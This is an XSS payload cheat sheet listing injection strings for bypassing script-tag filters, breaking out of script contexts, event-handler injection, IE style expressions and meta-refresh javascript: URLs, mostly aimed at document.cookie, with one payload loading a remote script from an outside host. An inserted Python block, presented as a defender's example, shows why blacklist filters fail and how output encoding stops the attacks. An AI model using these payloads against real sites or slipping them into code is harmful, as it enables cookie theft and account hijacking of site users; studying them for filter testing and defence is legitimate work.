Basics:
"><script >alert(document.cookie)</script>
Bypassing <script> tag filtering:
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</script>
"><<script>alert(document.cookie);//<</script>
foo%00<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
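As an added defender's example (not part of the original cheat sheet), the Python below shows why the payloads above defeat a one-pass <script> blacklist (double URL-encoding, nested tags) and why canonicalizing the input and then applying context-correct HTML output encoding is the dependable fix. The payload strings are taken from the list above; the filter functions are illustrative, not any real framework's API.

```python
import html
import re
from urllib.parse import unquote

# Matches <script ...> and </script> regardless of case and stray whitespace.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)


def naive_strip_script(value: str) -> str:
    """Typical blacklist filter: remove <script> tags in a single pass."""
    return SCRIPT_TAG.sub("", value)


def canonicalize(value: str) -> str:
    """Undo the encoding tricks before any inspection: repeat URL-decoding
    until the string is stable (defeats %253c double encoding) and drop
    NUL bytes (the foo%00<script> trick)."""
    prev, cur = None, value
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur.replace("\x00", "")


def strip_script_repeatedly(value: str) -> str:
    """Blacklist done properly: canonicalize, then strip until nothing changes,
    so <scr<script>ipt> cannot reassemble into <script> after one pass."""
    prev, cur = None, canonicalize(value)
    while cur != prev:
        prev, cur = cur, SCRIPT_TAG.sub("", cur)
    return cur


def encode_for_html(value: str) -> str:
    """The actual fix: encode for the HTML text/attribute context at output
    time. No tag survives, so no blacklist is needed."""
    return html.escape(value, quote=True)


def contains_script_tag(value: str) -> bool:
    """Detection check a test suite can run over filter output."""
    return SCRIPT_TAG.search(value) is not None


if __name__ == "__main__":
    nested = "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>"
    print(naive_strip_script(nested))        # a live <script> tag remains
    print(strip_script_repeatedly(nested))   # alert(document.cookie)
    print(encode_for_html(nested))           # inert text
```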
Inside a <script> block:
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//';
</script><script >alert(document.cookie)</script>
XSS without <script>:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert('XSS')>
On IE, a style attribute is accepted:
http://www.2cto.com?image=s%22%20style=x:expression(alert(document.cookie))
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29
In Firefox, if you can control a meta refresh tag, you can inject a javascript: URL:
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
XSS notes site: http://ha.ckers.org/xss.html
Author: L.N. blog